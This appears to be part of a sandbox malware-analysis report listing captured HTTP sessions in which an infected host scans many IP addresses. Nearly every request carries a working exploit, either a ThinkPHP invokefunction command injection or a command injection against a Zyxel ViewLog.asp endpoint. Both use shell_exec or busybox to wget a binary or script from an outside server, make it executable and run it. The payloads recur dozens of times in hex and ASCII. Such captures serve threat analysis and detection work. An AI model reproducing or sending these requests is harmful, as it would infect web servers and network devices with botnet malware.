                                                            Feb 14, 2024 09:29:52.924428940 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:53.116240978 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            857192.168.2.233659231.136.10.928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.995578051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:53.683435917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:55.027365923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:57.938937902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:03.314081907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:14.064639091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:35.821621895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            858192.168.2.235821631.200.93.198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.034784079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            859192.168.2.233432894.123.64.1698080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.035275936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            860192.168.2.235807662.29.84.1198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.036572933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            861192.168.2.233506294.123.45.1408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.036905050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            862192.168.2.235558831.200.24.2508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.036966085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            863192.168.2.234922294.123.74.468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.037491083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            864192.168.2.235490695.100.176.9180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.080553055 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:53.282506943 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 31 66 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 33 26 23 34 36 3b 66 31 31 38 39 31 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a51f1602&#46;1707899393&#46;f11891a</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            865192.168.2.235525295.101.83.2680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.093050957 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:53.307651997 CET478INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 256
                                                            Expires: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 33 26 23 34 36 3b 34 33 35 37 65 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ec91002&#46;1707899393&#46;4357ecc</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            866192.168.2.233992295.217.178.21080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.106751919 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:53.336275101 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            867192.168.2.234209695.216.26.9180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:53.115648031 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:53.352550030 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            868192.168.2.235047431.136.234.1848080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.550417900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.243113995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:57.618901968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.498596907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.129688025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.136137009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:39.917150974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            869192.168.2.236066631.41.216.868080
                                                            TimestampBytes transferredDirectionData
